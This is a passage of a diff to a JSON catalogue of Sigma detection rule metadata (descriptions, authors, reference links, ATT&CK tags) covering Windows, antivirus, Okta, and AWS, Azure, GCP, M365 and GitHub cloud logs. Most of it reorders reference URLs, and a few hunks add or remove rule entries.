"https://twitter.com/jseerden/status/1247985304667066373/photo/1",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
"https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension",
"https://twitter.com/lefterispan/status/1286259016436514816",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"
@@ -77729,8 +74324,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/",
"https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
+ "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"
],
"tags": [
@@ -77941,40 +74536,6 @@
"uuid": "e01fa958-6893-41d4-ae03-182477c5e77d",
"value": "Remote Access Tool - RURAT Execution From Unusual Location"
},
- {
- "description": "Detects a command used by conti to find volume shadow backups",
- "meta": {
- "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)",
- "creation_date": "2021/08/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_conti.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml"
- ],
- "tags": [
- "attack.t1587.001",
- "attack.resource_development"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d",
- "value": "Conti Volume Shadow Listing"
- },
{
"description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.",
"meta": {
@@ -78022,10 +74583,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
- "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
"https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
"https://twitter.com/gbti_sa/status/1249653895900602375?lang=en",
+ "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml"
],
"tags": [
@@ -78058,8 +74619,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/felixw3000/status/853354851128025088",
"https://twitter.com/rikvduijn/status/853251879320662017",
+ "https://twitter.com/felixw3000/status/853354851128025088",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"
],
"tags": [
@@ -78092,9 +74653,9 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.nextron-systems.com/?s=antivirus",
- "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448",
"https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619",
+ "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml"
],
"tags": [
@@ -78152,8 +74713,8 @@
"logsource.product": "No established product",
"refs": [
"https://twitter.com/mvelazco/status/1410291741241102338",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml"
],
"tags": [
@@ -78220,8 +74781,8 @@
"logsource.product": "No established product",
"refs": [
"https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797",
- "https://www.nextron-systems.com/?s=antivirus",
"https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml"
],
@@ -78264,8 +74825,8 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.nextron-systems.com/?s=antivirus",
"https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml"
],
"tags": [
@@ -78298,16 +74859,16 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.nextron-systems.com/?s=antivirus",
- "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection",
- "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection",
+ "https://github.com/tennc/webshell",
"https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection",
- "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
"https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection",
- "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
+ "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection",
"https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection",
"https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection",
- "https://github.com/tennc/webshell",
+ "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
+ "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
+ "https://www.nextron-systems.com/?s=antivirus",
+ "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml"
],
"tags": [
@@ -78340,12 +74901,12 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045",
- "https://www.nextron-systems.com/?s=antivirus",
- "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916",
- "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7",
- "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d",
"https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c",
+ "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045",
+ "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d",
+ "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7",
+ "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml"
],
"tags": [
@@ -78409,6 +74970,41 @@
"uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5",
"value": "Suspicious SQL Query"
},
+ {
+ "description": "Detects when Okta FastPass prevents a known phishing site.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2023/05/07",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "okta_fastpass_phishing_detection.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "okta",
+ "refs": [
+ "https://sec.okta.com/fastpassphishingdetection",
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1566"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e",
+ "value": "Okta FastPass Phishing Detection"
+ },
{
"description": "Detects when an security threat is detected in Okta.",
"meta": {
@@ -78423,8 +75019,8 @@
"logsource.product": "okta",
"refs": [
"https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm",
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml"
],
"tags": "No established tags"
@@ -78445,8 +75041,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml"
],
"tags": [
@@ -78479,8 +75075,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml"
],
"tags": [
@@ -78503,8 +75099,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml"
],
"tags": [
@@ -78527,8 +75123,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml"
],
"tags": [
@@ -78551,8 +75147,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml"
],
"tags": [
@@ -78575,8 +75171,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml"
],
"tags": [
@@ -78599,8 +75195,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml"
],
"tags": [
@@ -78633,8 +75229,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml"
],
"tags": [
@@ -78658,8 +75254,8 @@
"logsource.product": "okta",
"refs": [
"https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm",
- "https://developer.okta.com/docs/reference/api/system-log/",
"https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data",
+ "https://developer.okta.com/docs/reference/api/system-log/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml"
],
"tags": [
@@ -78692,8 +75288,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml"
],
"tags": [
@@ -78716,8 +75312,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml"
],
"tags": [
@@ -78740,8 +75336,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml"
],
"tags": [
@@ -78778,8 +75374,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml"
],
"tags": [
@@ -78963,10 +75559,10 @@
"logsource.product": "m365",
"refs": [
"https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
"https://o365blog.com/post/aadbackdoor/",
"https://www.sygnia.co/golden-saml-advisory",
"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf",
- "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml"
],
"tags": [
@@ -79449,8 +76045,8 @@
"logsource.product": "github",
"refs": [
"https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions",
- "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization",
"https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository",
+ "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disable_high_risk_configuration.yml"
],
"tags": [
@@ -79543,8 +76139,8 @@
"logsource.category": "No established category",
"logsource.product": "github",
"refs": [
- "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization",
"https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts",
+ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disabled_outdated_dependency_or_vulnerability.yml"
],
"tags": [
@@ -79674,11 +76270,11 @@
"logsource.category": "No established category",
"logsource.product": "gcp",
"refs": [
- "https://github.com/elastic/detection-rules/pull/1267",
- "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
"https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole",
"https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
- "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
+ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://github.com/elastic/detection-rules/pull/1267",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml"
],
"tags": [
@@ -79726,8 +76322,8 @@
"logsource.category": "No established category",
"logsource.product": "gcp",
"refs": [
- "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://kubernetes.io/docs/concepts/workloads/controllers/job/",
+ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://cloud.google.com/kubernetes-engine/docs",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml"
],
@@ -79956,8 +76552,8 @@
"logsource.category": "No established category",
"logsource.product": "gcp",
"refs": [
- "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
"https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml"
],
"tags": [
@@ -79991,8 +76587,8 @@
"logsource.product": "google_workspace",
"refs": [
"https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
"https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml"
],
"tags": [
@@ -80204,11 +76800,11 @@
"refs": [
"https://github.com/elastic/detection-rules/pull/1145/files",
"https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
"https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
"https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html",
"https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml"
],
"tags": [
@@ -80338,40 +76934,6 @@
"uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157",
"value": "AWS SecurityHub Findings Evasion"
},
- {
- "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n",
- "meta": {
- "author": "Darin Smith",
- "creation_date": "2022/06/07",
- "falsepositive": [
- "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons"
- ],
- "filename": "aws_ecs_task_definition_backdoor.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "aws",
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py",
- "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1525"
- ]
- },
- "related": [
- {
- "dest-uuid": "4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad",
- "value": "AWS ECS Backdoor Task Definition"
- },
{
"description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities",
"meta": {
@@ -80849,9 +77411,9 @@
"logsource.category": "No established category",
"logsource.product": "aws",
"refs": [
+ "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html",
"https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/",
"https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md",
- "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml"
],
"tags": [
@@ -80995,6 +77557,41 @@
"uuid": "b45ab1d2-712f-4f01-a751-df3826969807",
"value": "AWS STS GetSessionToken Misuse"
},
+ {
+ "description": "Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\nThis can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.\n",
+ "meta": {
+ "author": "Darin Smith",
+ "creation_date": "2022/06/07",
+ "falsepositive": [
+ "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons"
+ ],
+ "filename": "aws_ecs_task_definition_cred_endpoint_query.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py",
+ "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
+ "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_cred_endpoint_query.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1525"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad",
+ "value": "AWS ECS Task Definition That Queries The Credential Endpoint"
+ },
{
"description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.",
"meta": {
@@ -81065,9 +77662,9 @@
"logsource.category": "No established category",
"logsource.product": "aws",
"refs": [
- "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
"https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html",
"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml",
+ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml"
],
"tags": [
@@ -81125,8 +77722,8 @@
"logsource.category": "No established category",
"logsource.product": "aws",
"refs": [
- "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
"https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html",
+ "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml"
],
"tags": [
@@ -82176,8 +78773,8 @@
"logsource.category": "No established category",
"logsource.product": "azure",
"refs": [
- "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml",
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml"
],
"tags": [
@@ -82371,10 +78968,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml"
],
"tags": [
@@ -83494,10 +80091,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml"
],
"tags": [
@@ -83565,10 +80162,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml"
],
"tags": [
@@ -83746,10 +80343,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml"
],
"tags": [
@@ -83805,8 +80402,8 @@
"logsource.category": "No established category",
"logsource.product": "azure",
"refs": [
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
